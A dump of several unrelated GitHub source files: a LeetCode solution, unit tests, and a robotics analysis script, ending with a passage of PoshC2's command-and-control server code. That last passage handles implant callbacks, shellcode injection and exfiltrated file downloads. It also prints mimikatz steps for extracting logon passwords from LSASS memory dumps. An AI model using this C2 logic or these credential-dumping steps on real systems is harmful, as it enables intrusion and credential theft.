leetcode/345.reverse-vowels-of-a-string.py | geemaple/algorithm | 177 | 16947 | class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s) |
nndet/evaluator/detection/__init__.py | joeranbosma/nnDetection | 242 | 16958 | <reponame>joeranbosma/nnDetection<gh_stars>100-1000
from nndet.evaluator.detection.froc import FROCMetric
from nndet.evaluator.detection.coco import COCOMetric
from nndet.evaluator.detection.hist import PredictionHistogram
|
tensorflow_transform/test_case_test.py | LaudateCorpus1/transform | 970 | 16963 | <gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_transform.test_case."""
import re
from tensorflow_transform import test_case
import unittest
class TftUnitTest(test_case.TransformTestCase):
def testCrossNamedParameters(self):
test_cases_1 = [
{'testcase_name': 'a_1_b_1', 'a': 1, 'b': 1},
{'testcase_name': 'a_3_b_3', 'a': 3, 'b': 3},
]
test_cases_2 = [
{'testcase_name': 'c_2', 'c': 2},
{'testcase_name': 'c_4', 'c': 4},
]
expected_cross = [
{'testcase_name': 'a_1_b_1_c_2', 'a': 1, 'b': 1, 'c': 2},
{'testcase_name': 'a_1_b_1_c_4', 'a': 1, 'b': 1, 'c': 4},
{'testcase_name': 'a_3_b_3_c_2', 'a': 3, 'b': 3, 'c': 2},
{'testcase_name': 'a_3_b_3_c_4', 'a': 3, 'b': 3, 'c': 4},
]
self.assertEqual(
test_case.cross_named_parameters(test_cases_1, test_cases_2),
expected_cross)
def testCrossParameters(self):
test_cases_1 = [('a', 1), ('b', 2)]
test_cases_2 = [(True,), (False,)]
expected_cross = [
('a', 1, True), ('b', 2, True),
('a', 1, False), ('b', 2, False),
]
self.assertCountEqual(
test_case.cross_parameters(test_cases_1, test_cases_2), expected_cross)
def testAssertDataCloseOrEqual(self):
self.assertDataCloseOrEqual([{'a': 'first',
'b': 1.0,
'c': 5,
'd': ('second', 2.0)},
{'e': 2,
'f': 3}],
[{'a': 'first',
'b': 1.0000001,
'c': 5,
'd': ('second', 2.0000001)},
{'e': 2,
'f': 3}])
with self.assertRaisesRegexp(AssertionError, r'len\(.*\) != len\(\[\]\)'):
self.assertDataCloseOrEqual([{'a': 1}], [])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Element counts were not equal.*: Row 0', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'b': 1}])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Not equal to tolerance.*: Row 0, key a', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'a': 2}])
@test_case.parameters((1, 'a'), (2, 'b'))
def testSampleParametrizedTestMethod(self, my_arg, my_other_arg):
self.assertIn((my_arg, my_other_arg), {(1, 'a'), (2, 'b')})
if __name__ == '__main__':
unittest.main()
|
test/hummingbot/core/utils/test_fixed_rate_source.py | BGTCapital/hummingbot | 3,027 | 16966 | <filename>test/hummingbot/core/utils/test_fixed_rate_source.py
from decimal import Decimal
from unittest import TestCase
from hummingbot.core.utils.fixed_rate_source import FixedRateSource
class FixedRateSourceTests(TestCase):
def test_look_for_unconfigured_pair_rate(self):
rate_source = FixedRateSource()
self.assertIsNone(rate_source.rate("BTC-USDT"))
def test_get_rate(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("BTC-USDT"), Decimal(40000))
def test_get_rate_when_inverted_pair_is_configured(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("USDT-BTC"), Decimal(1) / Decimal(40000))
def test_string_representation(self):
self.assertEqual(str(FixedRateSource()), "fixed rates")
|
act_map/scripts/exp_compare_diff_maps.py | debugCVML/rpg_information_field | 149 | 17019 | <gh_stars>100-1000
#!/usr/bin/env python
import os
import argparse
import yaml
import numpy as np
from colorama import init, Fore, Style
from matplotlib import rc
import matplotlib.pyplot as plt
import plot_utils as pu
init(autoreset=True)
rc('font', **{'serif': ['Cardo'], 'size': 20})
rc('text', usetex=True)
kMetrics = ['det', 'mineig', 'trace']
kMetricsLabels = ['$\det$', '$\lambda_{min}$', '${Tr}$']
kSecToUs = 1.0e6
kPallete = [
'blue', 'green', 'red', 'gold', 'purple', 'gray', 'cyan',
'midnightblue', 'lime', 'lightcoral', 'darkgoldenrod', 'violet', 'dimgray', 'darkorange',
'black'
]
def normalize(data, min_val=0.0, max_val=1.0):
data_valid = [v for v in data if v is not None]
dmax = np.max(data_valid)
dmin = np.min(data_valid)
ddata = dmax - dmin
ddes = max_val - min_val
return [(v - dmin) / ddata * ddes + min_val if v is not None else v for v in data]
def logAndNormalize(data, min_val=0.0, max_val=1.0):
data_log = [np.log(v) if v > 0 else None for v in data]
return normalize(data_log)
def readResults(res_dir, nm):
file_nms = sorted([v for v in os.listdir(res_dir) if v.endswith('.txt') and nm in v])
print("- Found files for map {}:\n - {}".format(nm, '\n - '.join(file_nms)))
print("- read general info")
gen_nm = "general_info_{}.txt".format(nm)
general_info = {}
if gen_nm in file_nms:
data = np.loadtxt(os.path.join(res_dir, gen_nm))
assert data.shape == (4,)
general_info['n_vox'] = data[0]
general_info['t_construct'] = data[1]
general_info['ker_mem_kb'] = data[2]
general_info['pc_mem_kb'] = data[3]
print("- read fim")
fim_vox_c_nm = 'fim_vox_c_{}.txt'.format(nm)
fim = {}
if fim_vox_c_nm in file_nms:
fim_vox_c_fn = os.path.join(res_dir, fim_vox_c_nm)
fim_map_fn = os.path.join(res_dir, "fim_map_{}.txt".format(nm))
fim_pc_fn = os.path.join(res_dir, "fim_pc_{}.txt".format(nm))
fim_vox_centers = np.loadtxt(fim_vox_c_fn)
assert fim_vox_centers.shape[1] == 3
n_fim = fim_vox_centers.shape[0]
print(Style.DIM + "Found {} FIM".format(n_fim))
fim_map = np.loadtxt(fim_map_fn)
assert fim_map.shape[1] == 36
assert n_fim == fim_map.shape[0]
fim_pc = np.loadtxt(fim_pc_fn)
assert fim_pc.shape[1] == 36
assert n_fim == fim_pc.shape[0]
fim['vox_c'] = fim_vox_centers
fim['map'] = [v.reshape((6, 6)) for v in fim_map]
fim['pc'] = [v.reshape((6, 6)) for v in fim_pc]
fim_time_map_fn = os.path.join(res_dir, "fim_time_map_{}.txt".format(nm))
fim_time_map = np.loadtxt(fim_time_map_fn)
fim_time_pc_fn = os.path.join(res_dir, "fim_time_pc_{}.txt".format(nm))
fim_time_pc = np.loadtxt(fim_time_pc_fn)
fim['map_time'] = fim_time_map
fim['map_time_mean'] = np.mean(fim_time_map)
fim['pc_time'] = fim_time_pc
fim['pc_time_mean'] = np.mean(fim_time_pc)
print(Style.DIM + "Aver. Map: {}. Aver. PC: {}".format(
fim['map_time_mean'], fim['pc_time_mean']))
else:
print(Fore.RED + "Nothing found.")
print("- read query time")
t_query = {}
for m in kMetrics:
t_map_fn = os.path.join(res_dir, 't_query_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(t_map_fn):
print(Fore.RED + "* metric {} does not exist for query time".format(m))
continue
t_pc_fn = os.path.join(res_dir, 't_query_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(t_pc_fn)
t_map = np.loadtxt(t_map_fn)
t_map_mean = np.mean(t_map)
t_pc = np.loadtxt(t_pc_fn)
t_pc_mean = np.mean(t_pc)
assert t_map.size == t_pc.size
print(Style.DIM + "* metric {}: {} samples, map aver. {}, pc aver. {}".format(
m, t_map.size, t_map_mean, t_pc_mean))
t_query[m] = {}
t_query[m]['map'] = t_map.ravel().tolist()
t_query[m]['map_mean'] = t_map_mean
t_query[m]['pc'] = t_pc.ravel().tolist()
t_query[m]['pc_mean'] = t_pc_mean
print("- read optimal orientations")
optim_orient = {}
oo_vox_c_fn = os.path.join(res_dir, 'optim_orient_vox_c_{}.txt'.format(nm))
assert os.path.exists(oo_vox_c_fn), oo_vox_c_fn
oo_vox_c = np.loadtxt(oo_vox_c_fn)
assert oo_vox_c.shape[1] == 3
n_oo = oo_vox_c.shape[0]
optim_orient['vox_c'] = oo_vox_c
print(Style.DIM + "Total {} samples".format(n_oo))
for m in kMetrics:
oo_map_fn = os.path.join(res_dir, 'optim_orient_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(oo_map_fn):
print(Fore.RED + "* metric {} does not exist for optimal orientations".format(m))
continue
else:
print(Style.DIM + "* metric {}".format(m))
oo_pc_fn = os.path.join(res_dir, 'optim_orient_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(oo_pc_fn)
optim_orient[m] = {}
oo_map = np.loadtxt(oo_map_fn)
assert oo_map.shape == (n_oo, 3)
oo_pc = np.loadtxt(oo_pc_fn)
assert oo_pc.shape == (n_oo, 3)
optim_orient[m]['map'] = oo_map
optim_orient[m]['pc'] = oo_pc
print("- read metrics for continous motion")
cont_metrics = {}
cont_rot_fn = os.path.join(res_dir, 'metric_cont_rot_{}.txt'.format(nm))
if os.path.exists(cont_rot_fn):
cont_trans_fn = os.path.join(res_dir, 'metric_cont_trans_{}.txt'.format(nm))
assert os.path.exists(cont_trans_fn)
cont_metrics['rot'] = {}
cont_rot = np.loadtxt(cont_rot_fn)
assert cont_rot.shape[0] == 2
print(Style.DIM + "{} rotations.".format(cont_rot.shape[1]))
cont_metrics['rot']['map'] = cont_rot[0].ravel().tolist()
cont_metrics['rot']['pc'] = cont_rot[1].ravel().tolist()
cont_metrics['trans'] = {}
cont_trans = np.loadtxt(cont_trans_fn)
assert cont_trans.shape[0] == 2
print(Style.DIM + "{} translations.".format(cont_trans.shape[1]))
cont_metrics['trans']['map'] = cont_trans[0].ravel().tolist()
cont_metrics['trans']['pc'] = cont_trans[1].ravel().tolist()
else:
print(Fore.RED + "Nothing found.")
return {"general_info": general_info, 'fim': fim, 't_query': t_query,
'optim_orient': optim_orient, 'cont_metrics': cont_metrics}
def _writeComplexityTable(nm_to_res, pc_res_key, selected_nms, nm_to_label, complexity_table_fn):
sel_labels = [nm_to_label[v] for v in selected_nms]
with open(complexity_table_fn, 'w') as f:
f.write('# PC {}\n'.format(' '.join(sel_labels)))
# construction time
f.write('t_construct (sec) ')
f.write('- ')
for nm in selected_nms:
f.write('{} '.format(nm_to_res[nm]['general_info']['t_construct']))
f.write('\n')
# memory
f.write('memory (MB) ')
f.write('{:.2f} '.format(nm_to_res[pc_res_key]['general_info']['pc_mem_kb'] / 1024.0))
for nm in selected_nms:
f.write('{:.2f} '.format(nm_to_res[nm]['general_info']['ker_mem_kb'] / 1024.0))
f.write('\n')
# query
# fim
f.write('# query (us)\n')
f.write('fim ')
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['fim']['pc_time_mean'] * kSecToUs))
for nm in selected_nms:
fim_res = nm_to_res[nm]['fim']
if 'map_time' not in fim_res:
f.write('- ')
else:
f.write('{:.1f} '.format(fim_res['map_time_mean'] * kSecToUs))
f.write('\n')
# metrics
for m in kMetrics:
f.write('{} '.format(m))
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['t_query'][m]['pc_mean'] * kSecToUs))
for nm in selected_nms:
t_query = nm_to_res[nm]['t_query']
if m not in t_query:
f.write('- ')
else:
f.write('{:.1f} '.format(t_query[m]['map_mean'] * kSecToUs))
f.write('\n')
def _computeAndWriteFIMDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
fim_fro_diff = {}
sel_labels = [nm_to_label[v] for v in selected_nms]
for nm in selected_nms:
print('- calculating {}'.format(nm))
fim_pc = nm_to_res[nm]['fim']['pc']
fim_map = nm_to_res[nm]['fim']['map']
fim_diff_perc = []
for fim_pc_i, fim_map_i in zip(fim_pc, fim_map):
fro_pc_i = np.linalg.norm(fim_pc_i)
fro_dfim_i = np.linalg.norm(fim_map_i - fim_pc_i)
fim_diff_perc.append(fro_dfim_i / fro_pc_i * 100)
if top_save_dir:
with open(os.path.join(top_save_dir, 'fim_fro_diff_perc_{}.txt'.format(nm)), 'w') as f:
f.write('# each item is one percentage of FIM difference w.r.t. point cloud\n')
f.write('{}'.format(' '.join(['{:.2f}'.format(v) for v in fim_diff_perc])))
fim_fro_diff[nm] = fim_diff_perc
print(Style.DIM + "* {}: {} ({})".format(nm, np.median(fim_diff_perc), np.std(fim_diff_perc)))
if top_save_dir:
print('- writing table')
with open(os.path.join(top_save_dir, 'fim_fro_diff_table.txt'), 'w') as f:
f.write('# Median (std): {}\n'.format(' '.join(sel_labels)))
for nm in selected_nms:
diff_perc = fim_fro_diff[nm]
f.write("{} ({}) ".format(np.median(diff_perc), np.std(diff_perc)))
return fim_fro_diff
def _boxplotFIMDiffs(nm_to_fim_diff_perc, names, nm_to_label, top_save_dir):
xlabels = [nm_to_label[v] for v in names]
data_labels = ['FIM Diff']
colors = [kPallete[0]]
data = []
for nm in names:
data.append(nm_to_fim_diff_perc[nm])
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, [data], data_labels, colors, legend=False)
ax.set_ylabel("FIM diff. (\%)")
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'fim_diffs_boxplot.png'), bbox_inches='tight')
def _computeAndWriteOptimalOrientDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
orient_diffs = {}
for nm in selected_nms:
print('- calculating {} ...'.format(nm))
orient_diff_per_metric = {}
oo_results = nm_to_res[nm]['optim_orient']
for m in kMetrics:
diffs_i = []
for o_map, o_pc in zip(oo_results[m]['map'], oo_results[m]['pc']):
cos_val = max(-1.0,
min(1.0,
np.dot(o_map, o_pc) / (np.linalg.norm(o_map) * np.linalg.norm(o_pc))))
diffs_i.append(np.rad2deg(np.arccos(cos_val)))
print(Style.DIM + "{}: {} ({})".format(m, np.median(diffs_i), np.std(diffs_i)))
orient_diff_per_metric[m] = diffs_i
orient_diffs[nm] = orient_diff_per_metric
if top_save_dir:
with open(os.path.join(top_save_dir, 'orient_diffs_{}.txt'.format(nm)), 'w') as f:
for m in kMetrics:
f.write('{} {}\n'.format(m, ' '.join([str(v)
for v in orient_diff_per_metric[m]])))
return orient_diffs
def _boxplotOrientDiffs(orient_diffs, names, nm_to_label, top_save_dir):
xlabels = kMetricsLabels
data_labels = [nm_to_label[v] for v in names]
colors = [kPallete[i] for i, v in enumerate(names)]
data = []
for nm in names:
data_i = []
for m in kMetrics:
data_i.append(orient_diffs[nm][m])
data.append(data_i)
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, data, data_labels, colors)
ax.set_ylabel("Orientation diff. (deg)")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'orient_diffs_boxplot.png'), bbox_inches='tight')
def _compareContinuousMotion(nm_to_res, selected_nms, nm_to_label, top_save_dir):
pc_cont_motion_res = nm_to_res[selected_nms[0]]
pc_rot_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['rot']['pc'])
pc_trans_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['trans']['pc'])
fig_rot = plt.figure(figsize=(8, 6))
ax_rot = fig_rot.add_subplot(111)
ax_rot.plot(pc_rot_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_rot.plot(logAndNormalize(nm_to_res[nm_i]['cont_metrics']
['rot']['map']), label=nm_to_label[nm_i])
ax_rot.set_xticks([])
ax_rot.set_xlabel('Continuous Rotation')
ax_rot.set_ylabel('Normalized Det.')
plt.legend()
plt.tight_layout()
fig_rot.savefig(os.path.join(top_save_dir, 'continuous_rotation.png'), bbox_inches='tight')
fig_trans = plt.figure(figsize=(8, 6))
ax_trans = fig_trans.add_subplot(111)
ax_trans.plot(pc_trans_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_trans.plot(logAndNormalize(nm_to_res[nm_i]
['cont_metrics']['trans']['map']), label=nm_to_label[nm_i])
ax_trans.set_xticks([])
ax_trans.set_xlabel('Continuous Translation')
# ax_trans.set_ylabel('Normalized Det.')
# plt.legend()
plt.tight_layout()
fig_trans.savefig(os.path.join(top_save_dir, 'continuous_translation.png'), bbox_inches='tight')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--res_dir', required=True)
parser.add_argument('--analyze_config', required=True)
parser.add_argument('--save_dir', type=str, default='analysis_results')
parser.add_argument('--pc_res_key', type=str, default='quad_info_0p5')
parser.set_defaults(map_names=['quad_info', 'quad_trace', 'gp_info', 'gp_trace'])
args = parser.parse_args()
print(Fore.YELLOW + args.__dict__.__str__())
with open(args.analyze_config, 'r') as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
print("Read configurations:\n{}".format(cfg))
map_names = []
map_nm_to_label = {}
for d in cfg['all_maps']:
map_nm_to_label.update(d)
for k in d:
map_names.append(k)
print(Fore.GREEN + "Maps to compare:\n- {}".format('\n- '.join(map_names)))
print(Fore.GREEN + "Labels:\n{}".format(map_nm_to_label))
fim_map_nms = [v for v in map_names if 'info' in v]
compare_orient_map_nms = [v for v in map_names if 'info' in v]
compare_cont_motion_map_nms = [v for v in map_names if 'info' in v]
print("Will analyze FIM for {}".format(fim_map_nms))
print("Will compare orientations for {}".format(compare_orient_map_nms))
print("Will compare cont. motion for {}".format(compare_cont_motion_map_nms))
save_dir = os.path.join(args.res_dir, args.save_dir)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
else:
print(Fore.RED + "Save folder exists, will re-use and overwrite.")
print("Going to save to {}".format(save_dir))
map_nm_to_res = {}
for map_nm in map_names:
print(Fore.GREEN + "====> Reading {}...".format(map_nm))
map_nm_to_res[map_nm] = readResults(args.res_dir, map_nm)
print(Fore.YELLOW + Style.BRIGHT + "Start analysis.")
print(Fore.GREEN + "1. Table of complexity.")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, map_names, map_nm_to_label,
os.path.join(save_dir, 'complexity_table.txt'))
print(Fore.GREEN + "2. FIM difference.")
map_nm_to_fim_diff_perc = _computeAndWriteFIMDiff(
map_nm_to_res, fim_map_nms, map_nm_to_label, save_dir)
_boxplotFIMDiffs(map_nm_to_fim_diff_perc, fim_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "3. Optimal views.")
map_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, compare_orient_map_nms, map_nm_to_label, save_dir)
_boxplotOrientDiffs(map_nm_to_orient_diff, compare_orient_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "4. Continous motion.")
_compareContinuousMotion(map_nm_to_res, compare_cont_motion_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + Style.BRIGHT + "Start processing specified subsets...")
sel_dir = os.path.join(save_dir, 'selected_results')
if not os.path.exists(sel_dir):
os.makedirs(sel_dir)
if 'sel_complexity_table_entries' in cfg:
print(Fore.GREEN + "- complexity table")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, cfg['sel_complexity_table_entries'], map_nm_to_label, os.path.join(
sel_dir, 'complexity_table.txt'))
if 'sel_fro_norm_table_entries' in cfg:
print(Fore.GREEN + "- FIM diff. table")
sel_fim_nms = cfg['sel_fro_norm_table_entries']
sel_nm_to_fim_diff = _computeAndWriteFIMDiff(
map_nm_to_res, sel_fim_nms, map_nm_to_label, sel_dir)
_boxplotFIMDiffs(sel_nm_to_fim_diff, sel_fim_nms, map_nm_to_label, sel_dir)
if 'sel_hist_orient_entries' in cfg:
sel_orient_nms = cfg['sel_hist_orient_entries']
print(Fore.GREEN + "- Orientation diff.")
sel_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, sel_orient_nms, map_nm_to_label, sel_dir)
_boxplotOrientDiffs(sel_nm_to_orient_diff, sel_orient_nms, map_nm_to_label, sel_dir)
if 'sel_cont_motion_plot' in cfg:
print(Fore.GREEN + "- continuous motion")
_compareContinuousMotion(
map_nm_to_res, cfg['sel_cont_motion_plot'], map_nm_to_label, sel_dir)
|
poshc2/server/Tasks.py | slackr/PoshC2 | 1,504 | 17027 | import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
